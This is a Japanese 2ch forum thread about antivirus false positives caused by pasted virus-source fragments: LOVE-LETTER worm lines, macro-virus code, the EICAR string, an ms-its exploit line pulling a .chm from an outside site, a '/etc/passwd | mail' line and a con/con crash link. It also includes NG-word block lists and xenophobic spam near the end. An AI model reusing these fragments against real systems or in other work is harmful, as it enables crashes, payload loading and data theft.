[email protected] If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
Live2ch使ってます
>>540 レスありがとうございます。
ログフォルダの指定は合っていました。
ウィルスの検出場所は、Live2ch\temp.htm、という所です。
このHTMLファイルをNAVの除外に設定すればいいんですかね?
それとも止めといたほうがいいですか?(このファイルを削除しても意味無しですよね)
よろしければレスお願いします。
>>541 ID隠して騙りは止めてね
>>540 言い忘れました、ちなみに
Live2ch\temp.htmはログフォルダの外にあるファイルです。
>>542-543 こちらでも確認しました。
Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。
temp.htmを除外に加えたら正常に表示されました。
注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。
また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや
お使いの2ちゃんねるブラウザのスレを見るようにしてください。
>>545 わざわざ再現までしていただき(しかもこんな夜中に)すみません。。。
temp.htmを除外に加えたら、無事このスレもLive2chで見る事が出来ました。
ありがとうございます!
しかも、過去ログまで探してくれたんですね、、、ありがとうございます。
こんばんは。
>>17 のソフトですが、対応するスクリプトを増やしました。
それから、検索の途中で中止できるようにしました。
bbs.cgiが更新されて
>>4 のような置換がちゃんと行われるようになった模様です
今後はウィルスコード貼っても反応しなくなるのかな
ダメですた
http://news18.2ch.net/test/read.cgi/mnewsplus/1149087966/66 >>4 は完全に嘘であることが判明したので
次スレから削除かな
削除するだけだと「親切にも」追記する人が現れかねないから
別のテンプレに差し替えた方がいいかな
>>552 >>4 の置換で反応しないものもありますが、反応するものも
あります。完全に嘘というわけではないです。
どっちにしろ置換するようになったんだから
>>4 は大幅書き換えが必要
こんばんは。
>>17 のソフトですが、フォルダの設定によって検索できない場合
がありましたので、修正しました。
http://www.geocities.jp/cen_hp/index.html >>556 Q. 2chが文字を置換しないのが悪いって聞いたんだけど
A. 情報が古いと思われます。2006年6月から置換するようになりましたが、
問題の文字を使わなくてもノートンが誤検出する文字列は作れるので
相変わらず反応する場合があります。
↑とか追加した方がいい。単に消すと
> 「親切にも」追記する人が現れかねないから
を防げない。
jane doe view使ってるんですが、
ウィルスコードに反応したせいで、取得したログが消滅するのについては、
どの専ブラでも基本はログと書き込みフォルダを
p + w * 10 <br> End Sub <br>
さっきこのウィルスソースが2ちゃん掲示板に埋められてるのを見てしまったら、
>>570 行間が広くなるのはシリア語ブラクラじゃないのか?
>>572-573 レスありがとうございます。
シリア語ブラクラだと行間が広くなる以外の被害はないですか?
初めて聞いたもので>シリア語ブラクラ
さきほど念のためもう一度ウィルスチェックしましたがウィルス発見なしでした。
ブラウザと閉じるときにInternetTemporaryFileの中身を削除する設定にしてあるのですが
こちらも念のためInternetTemporaryFileの中身も確認してみましたが
cookieファイルとfaviconファイルのみ格納されていました。
「html」「htm」がなくなってれば大丈夫ですかね?
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
特定のスレに擬似ウィルスコード貼り付ける奴がいて困ってます。
ノートンのauto protect と手動スキャンで、
専ブラを除外するように設定してるんですが、スレを開くとエラーになってしまいます。
http://ansitu.xrea.jp/guidance/?NortonInternetSecurity このサイトに書かれてる、信頼のアドレスを追加の設定はしました。
エラーのログを取得して、弾かれて、
有志さんの誤反応無効化スクリプトで書き換えて、
時間たつのまってから閲覧。しかもレス番はズレでわけわかめ
という状態です。
何かうまく弾く方法はないんでしょうか?
>>578 >>2 ё
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
時々スレを転々としてると、急に変な改行になるんですが(文と文の隙間が全部空いてしまう)
l'vヘ
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail
[email protected] If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
このスレに貼ってあるソースは大丈夫なのですか?
例えば
>>580-581 とか、
>>588 とか…
このスレだと反応ないんですが、何か特別なのでしょうか?
>>589 心配しすぎだと思うんです(><)
これが動いたら2chは大騒ぎになっちゃうと思うんです(><)
誘導されてきました
>>594 ありがとうございます。
見分けるコツみたいなものはあるんですか?
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ノートンがvbsウィルスのソースに誤反応3
http://pc7.2ch.net/test/read.cgi/pcqa/1109609938/ テンプレにでも入れるか・・・?
脳豚使うなら自力で何とかしろよ・・・
___ゲームキャラ板でもモニカワイイモニカ様___
http://game10.2ch.net/test/read.cgi/gamechara/1146829934/ このスレを開くと閲覧できないどころか
一回再起動しないとgame10鯖に繋がらなくなる障害が出るんですが
NGコードとかどう打って対処すればいいのですか?
使用2chブラウザは Jane Doe Styleです。
>>599 専用ブラウザでスレを取得した「だけ」で反応したら間違いなく誤反応なので心配無用。
スレに貼られたURLをクリックして反応したならウィルスの疑いあり。
てゆーか、やたらとクリックしちゃダメ。
Your attention,Please. みなさまに申し上げます
http://pc7.2ch.net/test/read.cgi/pcqa/1151570961/111- 111 名前:ひよこ名無しさん 投稿日:2006/06/29(木) 21:33:23 ID:P5JFBD43
キャップもらってパスワードもらって、名前欄に書き込んでも、
○★ にならなくて○◆になってしまうんですが、どうしてでしょうか
113 名前:愛新覚羅 ◆WjkbiI..A2 投稿日:2006/06/29(木) 21:34:04 ID:???
>>111 ウイルシかな
>>612 ノートン先生を誤反応させるためにわざと貼ってるんだよ
ただ、これ書いた人がカードゲームのトレードスレに
ノートン2006でAutoprotectの設定で、ログのフォルダを除外したいのですが、
専ブラ(Jane)での書き込みの妨害も先生の仕業?
>>618 > 更新かけて解決するのであれば(期限切れ)、
それはないな。FW(が入っているのであれば)一時的に切ってみるしか
>>619 まったくの初心者ですが
「まったくの初心者」
スレを開いたら突然ウィルスに感染したんですがurlを直接踏まなくても
, --- 、_
<body onload=window()> http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/ できれば既出のものじゃなくて
2CH自体、5月からはじめました。
>>631 ですけど、感染したときにLOVE-LETTERなんとかというものが画面に表示されました。
そのときなんだかわからなかったので、続行のボタンを押しました。
漢字を変換するとIEが落ちてしまうので、最初に出てきた感じで該当するものが泣ければ
そのままにしています。
なんとかならないでしょうか。
ここはウイルス対策ソフトの「誤反応」のスレです。
>>633 よく分からないならクリーンインストールしろ。
それも出来ないなら就職浪人決定。
ウイルスコードの誤反応ではありませんが、
質問お願いします。
>>645 デフォルトでそうなってるから心配すんな
マカフィーでもコード貼られたログファイル消されて見れないんだけどどうすればいい?
でも、ノートン自体は反応しても実際にウイルスではないんですよね?
>643
>>653 >>643 末尾に挙げられている過去ログでレス番727あたりから読んでみるといいかも
http://mickey.mirv.net/2chnis.html を見て
>タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」
をやってみたのですが左クリックをしても何も出てきません。
右クリックなら「Norton Anti Virusを開く」「Auto Protectを無効にする」
「Norton Antiオプション」の三つのメニューが出るんですが、
どうすればNorton Internet Securityを開くことができるんでしょうか。
>>655 もしかしてNAVしかインストールしてないとか?
http://mickey.mirv.net/2chnis.html には説明ないけど
NAVでも誤反応する。
>>654 参照
■2ちゃんねる 初心者が安心して質問できるスレッドガイダンス (ノートントラップ全般への対策法)
http://ansitu.xrea.jp/guidance/?Trap#NortonTrap ■2ch NIS問題まとめページ
http://mickey.mirv.net/2chnis.html ■特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7 ・上記設定でまだ反応がある場合は、「専ブラプログラムフォルダ丸ごと」も同様に除外に追加してみて下さい。
・2ちゃんねる専用ブラウザの読み込み禁止単語機能に、
「v bs」、「O nload」、「o nload」、「L OVE-LETTER」、「M acro」、「n osuch」、「E ICAR-STANDARD-ANTIVIRUS-TEST」などの
単語を登録しておきましょう。(※ 単語の途中一箇所スペース空けてるんで詰めて登録して下さい)
・各専用ブラウザのスレッド情報も参照して下さい。
・NIS(NPF)のファイアーウォールを誤作動させるコード文字列に関して → 応急対策を参照
・タスクトレイのノートンアイコンをクリック → NISを無効にする (5分) →
NIS無効中に専用ブラウザでスレッドをリロード取得 → NISを有効に戻す (※この方法でもNPFトラップ回避可能)
■いきいき Wiki - ノートンインターネットセキュリティに関するFAQ
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq00 727 名前: 動け動けウゴウゴ2ちゃんねる 投稿日: 2006/03/26(日) 16:24:59 ID:pwaEyKGo0
>>726 参考までに・・・ただし、自己責任で
ノートンアンチウイルス2006 Ver.1
http://pc8.2ch.net/test/read.cgi/sec/1129452372/996 > まず、オプション→インターネット→インターネットワーム防止→除外の設定で、
> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。
> そのあと、オプション→インターネット→インターネットワーム防止→
> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、
> 遮断解除してok。で、ok。
#include <mmlite.h>
>>1 >>2chブラウザのログ保存フォルダを「除外」に設定。
これがどういうことかもうすこし詳しく説明してください。
2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
除外に認定とは、何の除外に認定すればいいのでしょうか。
これだけでは全く意味がわかりません。
[ 自主制作映画 ] [ ジャッカル ] 第 0012 話 ジャッカルがあるさ ( Rev 0001 ) ( 低画質 Ver ).avi 7,177,218 07818b50961750fbaef7124384ac2e70
>>662 > 2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
使っている2ch専用ブラウザによって違います。
専用ブラウザを使っていない人には関係ありません。
> 除外に認定とは、何の除外に認定すればいいのでしょうか。
ウイルス対策ソフトの検知対象から除外するように設定します。
やり方はウイルス対策ソフトによって違います。
除外設定(「認定」ではなく「設定」)ができないウイルス対策ソフトもあります。
> これだけでは全く意味がわかりません。
以上の説明で全く意味がわからないなら、当面は気にする必要ありません。
実際にその現象に遭遇すれば自然とわかるようになるでしょう。
>>664 ■2ちゃんねる 初心者が安心して質問できるスレッドガイダンス (ノートントラップ全般への対策法)
http://ansitu.xrea.jp/guidance/?Trap#NortonTrap ■2ch NIS問題まとめページ
http://mickey.mirv.net/2chnis.html ■特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7 ・上記設定でまだ反応がある場合は、「専ブラプログラムフォルダ丸ごと」も同様に除外に追加してみて下さい。
・2ちゃんねる専用ブラウザの読み込み禁止単語機能に、
「v bs」、「O nload」、「o nload」、「=w indow」、「L OVE-LETTER」、「M acro」、「n osuch」、「E ICAR-STANDARD-ANTIVIRUS-TEST」
などの 単語を登録しておきましょう。(※ 単語の途中一箇所スペース空けてるんで詰めて登録して下さい)
・各専用ブラウザのスレッド情報も参照して下さい。
・NIS(NPF)のファイアーウォールを誤作動させるコード文字列に関して → 応急対策を参照
・タスクトレイのノートンアイコンをクリック → NISを無効にする (5分) →
NIS無効中に専用ブラウザでスレッドをリロード取得 → NISを有効に戻す (※この方法でもNPFトラップ回避可能)
■いきいき Wiki - ノートンインターネットセキュリティに関するFAQ
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq00 Norton Anti Virus 2003です。
>>667 自分が引用してる文章をよく読めばわかるだろうが
datやidxなどの「ファイル」を除外するのではない
「フォルダ」を正しく除外していればログが自動的に破棄されることはない
>>668 言われてやっと気付きました。ありがとうございます
Norton Anti Virus 2004を使用しています。
手動スキャンとAuto-ProtectでLogフォルダの除外と
http://mickey.mirv.net/2chnis.html ←の対処はしてありますが、
たまーに一部のウイルスソースに引っかかってしまいます。
そうなると、しばらくインターネットセキュリティを無効ししないとならなくなります。
例えば最近だと、下記のウイルスソースです。
両方なのか、片方なのか分かりませんがウイルス警告がでます。
対処方法はありますか?
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
といった感じのものです。
今やってみたのですが671と672ではノートンは反応しませんでした。
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
>>675 スマン
>>676 だと何にも反応しないんだよな
反応するときはなんなのかな?
Norton Anti Virus2003でWinXP/IE6。Live2chです。
>>679 >>643 辺りの件は対策しましたか?
NAVでも誤反応します。
すみません解決です
除外指定するのはlog保存フォルダじゃなくインストールフォルダ自体のことだったんですね
>>680 ありがとうございます
参考になりました
携帯厨よけの誤反応作ってくれ
>658タソのをしても反応するし2ちゃんねるのIPアドレスを除外
管理者がサクージョ&規制すればいい。
>>686 誤反応するような不便なソフトは
淘汰されて滅びたほうがいい、という考え方らすい
>>689 GUIになったのはいいけど.NET Frameworkが必要なければもっとよかったなぁ。
PCがしょぼいからできるだけ余計なものは入れたくないんだよね。
ウチでは古いバージョンの方を使わせてもらうことにします。
>>691 使っていただいてありがとうです。
.NET Frameworkを使わない前のバージョンの方が起動
が早いですね。
まあ、Visual C#で割と楽にGUIが作れるいうのが理由です^^;
<body onload=window()>
ウィルスコードの適当な文字をNGワードに設定しとくとかじゃダメなの?
大空寺系には反応しなくなったけど、
いい加減ウザくなったしどうせ更新時期だったからノートン先生からバスターに切り換えてみた。
ノートン先生がもうすぐ更新なんですが、
個人的にはジャストシステムから11月に発売のカスペルスキー6かな?
Norton Anti Virus2006を使っています。
>>658 の操作中、「現在、AutoBlockで遮断しているコンピュータ」
のところに何もアドレス等が載ってないのですが
どうすればこの先誤反応解除の操作を進められるんでしょうか。
>>703 専用ブラウザのフォルダごと全て除外にしたら俺は止まったよ
同じNorton Anti Virus2006だけど
>>703 なにも載ってないってことは
丁度そのときに遮断されてないのだから解除する必要はない。
前半の設定ができていれば問題ないのでは?
>>704 その設定で止まるやつと
インターネットワームの誤反応とは別物だよ。
ノートンがVBS.Freelink.Bというウイルスに反応したのですが、
NIS2006
ane doe style2.41 WinXPsp2使用
>>710 C\Program Files\Jane Style\Logs\2ch
なんですが、間違ってるのでしょうか?
経営学部の学生さん
>>701 です。
ありがとうございました。
11月まではノートン先生が頑張ってくれそうなので、
その後の購入の参考にします。
>>709 一定時間板が開けなくなる件の誤反応はログフォルダ除外では対応できません。
2chを見ようとすると「侵入を検出して遮断しました。」というダイアログが表示されて
2chを見れなくなってしまう問題のまとめページ。
http://mickey.mirv.net/2chnis.html NAVの人は下記スレの698辺りから参照
ノートン誤作動対策本部
http://qb5.2ch.net/operate/kako/1133/11331/1133161720.html >>707 NIS2006はよくわからないけど上のリンクとスレ参考にしる。
>>713 ありがとうございます。
教えて頂いた
http://mickey.mirv.net/2chnis.html を
やってみて、まただめな様なら
また来ます。ありがとうございました。
ノートンが反応して、偽ウイルスを削除した場合
ウイルスを削除というか、駆除できずにファイル(?)ごと削除してるんですけど。。。
>>715 起こらない
>>716 2chのログファイル、またはIEキャッシュファイルを監視対象から除外
>>717 ありがとうございます。
具体的には、何を削除しているのでしょうか。
例えば、以下のようなものが削除されてしまいます。
Documents and Settings \ 名前 \ Local Settings
\ Temporary Internet Files \ Content IES \ SOUTTMDI2 \ l50[1].htm
てことは削除されてもまったく問題ないんですよね?
VShieldを有効にするってどうしたらいいんですか?
>>257 自分も
>>259 さんと同じで
こういうの貼られてたら、暫く板が開けなくなります・・
【質問】
1:ノートン使って専ブラで見ている人は、みんな実行しているのでしょうか?
2:そこでやはり↓のサイトの対処法をしないといけないのでしょうか?
http://mickey.mirv.net/2chnis.html いまいち、やるのが怖くて躊躇しているのですが・・
(ウイルスとかが)
WinXPsp2 Jane doe style2.41を使っています
別に怖いことないと思うが。
設定の意味がわからないとか漠然とした不安があるのでしょうか。
抵抗があるなら
>>689 にある誤反応スクリプト無効化ソフトを使って
その都度対処すれば良いと思います。
実行しなければ自分が不便な思いをするだけ
2007は誤反応しなくなったんですか?
バスターという最高のアンチウィルスがありながらどうして人はノートンを選ぶんだろう
>>728 バスターはOSを起動できなくしたという前科があるからいまいち信用できない。
>>728 >>731 前科どころか、2007は起動時にOSごとフリーズさせる実績があるから
たとえ誤反応が多くても、農豚をオススメする。
ノートンのウィルス誤反応警告の表示警告がここ2、3日で変わったのは自分だけ?
恵比寿視力回復研究所八王子クリニック大塚美容形成外科・歯科今泉ハートクリ
昨夜から急にanime鯖だけ繋がらなくなりました。
自己解決しました
ログフォルダは除外していたのですが、2chのスレを開いてて
ただの誤反応です
専ブラではなくIEでスレッドを閲覧したのが原因で、
>>1 に書いてある通り、別に心配ありません
Temporary Internet Filesを除外したりしてはいけません
(
>>1 以下、テンプレの各リンク先もよく読みましょう)
ノートンを2007に更新したらいろいろ探してもノートントラップを防ぐための
Window Live OneCareに乗り換えたらぴくりとも反応しなくなったよ
未だにウイルスコードに手焼いてるのかよ、お前ら
今こそ天下無敵OS界の重鎮Microsoft様が作ったLive OneCareに乗り換えろよw
どうせ数年で他のウイルスソフトは駆逐されるぜ
早いうちに乗り換えといた方が吉!
今なら85日無料版が使えるよ
http://ideas.live.com/programpage.aspx?versionid=b2456790-90e6-4d28-9219-5d7207d94d45 製品版は1月31日発売
価格はなんとamazonで買えば3000円ぐらいだったはず
http://www.amazon.co.jp/gp/product/B000K15VZS/ しかも、3つのPCにインストールしてもいいという大サービス
さあ、みんなWindows Live OneCareに乗り換えよう!!!
禁断の壷を開きながらスレを開くと、ログファイルが開けないよ、ログを削除
YES → 【ヒットした?】 ─ YES → じゃあ聞くな。
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
初心者ですが、CAアンチウイルス2007というウイルス対策ソフト
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
こうじやりおれ
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
ウイルスバスターはフリーのアンチウイルスにも劣る脅威の低検出率だった!!!!! http://blog.chip.de/0-security-blog/microsoft-verbessert-seinen-virenscanner-20070821 このスレの784なんだけど
http://ex20.2ch.net/test/read.cgi/base/1189862026/ これ貼られてから先生が怒った後にログ読み込んだらレスが見えなくなった(ちなみにLive2ch)
適当に文字列NGワードに突っ込んだらまたログ読めるようになったけど…これは何なんだ?
スレ見ようと思ったらカスペでトロイが検出されちゃった
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
ここにいろいろあって
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
>>762 >>764 は同じ人かな?
カスペのメニュー画面で
[ファイルアンチウィルス]→[設定]→[カスタマイズ]
を選択。
開いた窓の(ファイル形式)項目にある
「プログラムとドキュメント」
を選択すればいいと思う。デフォルトでは「すべて」になってるはず。
どちらを選ぶかはヘルプ見て自己判断。
NIS2004を使用している人に聞きたいのですが、拡張→ブラウザについての情報を遮断に設定すると強制フシアナになりますか?
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
Windows 2000にシステムの復元を薦める無職俟倶大犂 ◆UlRxjIbrcg蚤 >>627 2009だけど
2009だけど
VBS.LoveLetter.varって言うのがノートンで検出されたんだけど誤探知?
もしそれが2chを専用ソフトで見てて起きたのなら誤検地。
専用ソフトって2cn専用ブラウザですか?
標準のブラウザでも
>>16 とかを開けば反応するでしょ
まだ報道されていない犯罪です。
まだ報道されていない犯罪です。
●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●
<A href="file:///C:/con/con/con">Here</A>
ノートン導入してから2ちゃんの生活全般が見れないことがあった。
↑
■■中国製品不買運動を広めよう■■
中国は、この先、日本がどんなに謝罪しても、どんなに工場建設や
技術援助等をしても、延々と暴力的反日デモを繰り返す。
将来、南シナ海でフィリピンにしてるような卑劣な軍事的・経済的圧力
をかけてくることは確実。中国製品を買って中国経済を下支えする必要なし
●買い物をする際に、生産国を必ずチェック、中国生産品は絶対買わない
日本人が中国製品を買って、中国経済を下支えする必要はない。
■マイクロソフトの調査活動で判明した、中国製PCに出荷時、
製造過程でマルウェアが混入されていた事実も要注意。
(ソース2箇所)
・Yahoo!ニュース
http://headlines.yahoo.co.jp/hl?a=20120917-00000001-cwj-sci ・税金と保険の情報サイト
http://www.tax-hoken.com/news_aiRYedKXWe.html Pso2 ぷそに ネトゲ クソゲ オンラインゲーム プロ Epic 長谷川亮太 壁紙 Wallpaper イケメン 就活 電車 チンフェ
スーツ 国士舘大学 ネクタイ 黒人 八神太一
このスレッドは1000を超えました。
2ちゃんねるの運営はプレミアム会員の皆さまに支えられています。
運営にご協力お願いいたします。
───────────────────
《プレミアム会員の主な特典》
★ 2ちゃんねる専用ブラウザからの広告除去
★ 2ちゃんねるの過去ログを取得
★ 書き込み規制の緩和
───────────────────
会員登録には個人情報は一切必要ありません。
月300円から匿名でご購入いただけます。
▼ プレミアム会員登録はこちら ▼
https://premium.2ch.net/ ▼ 浪人ログインはこちら ▼
https://login.2ch.net/login.php
このスレへの固定リンク: http://5chb.net/r/pcqa/1109609938/ ヒント: http ://xxxx.5chb .net/xxxx のようにb を入れるだけでここでスレ保存、閲覧できます。TOPへ TOPへ
全掲示板一覧 この掲示板へ 人気スレ |
>50
>100
>200
>300
>500
>1000枚
新着画像 ↓「ノートンがvbsウィルスのソースに誤反応3->画像>6枚 」 を見た人も見ています:・テレ朝からTBSに飛び火 赤江珠緒、新型コロナウイルス陽性反応 ネット「報ステ関係者もそろそろ感染爆発やろ?」「テレ朝クラスター 【速報】石黒氏がノーベル賞を受賞したと知ったネトウヨ達の反応をご覧下さい 【イタリア】セリエA選手初の感染者…ユベントス イタリア代表DFDFルガーニに新型コロナウイルス陽性反応 【Record China】「日本人の名前じゃないか!」=韓国ネットがカズオ・イシグロ氏のノーベル賞受賞に敏感反応[10/6] ★2 ガーシー「ある企業のM社長がウクライナ女性を集めて乱交パーティーをしてた」→楽天・三木谷社長が反応、激怒 ★4 [Anonymous★] 【インフルエンザ】治療薬「ゾフルーザ」耐性ウィルス出現…猛威収まらず“警報レベル超え” 【安倍元首相銃撃】 韓国の最初の反応「ノーコメント」、事件を糾弾するメッセージさえ出さない…中国は日本語で慰労伝えた[07/10] [LingLing★] 【物理】高エネルギー原子核衝突反応における運動量を持つ粒子の起源を新たに特定、上智大など [すらいむ★] 【民主主義】「香港人は移住しないで」日本の“冷たい反応”にも香港人はめげない。当事者が今、日本に一番伝えたいこと ★3 [ブルーベリーフラペチーノうどん★] 【コロナ】米でワクチン接種後、21人に強いアレルギー反応 [ぐれ★] 【野球/MLB】エンゼルス・大谷翔平、7試合ぶりスタメン外れる タイガース戦初戦はベンチスタート 新規が勘違いしていること「神7=上位7名」「ハート型ウイルス=ノースリーブスの楽曲」「チームA=48グループのフラッグシップ」 【芸能】森下悠里、抹茶色のピッタリワンピで脇チラ!「初めて女性の脇にドキドキした」とファンが過敏に反応 [フォーエバー★] 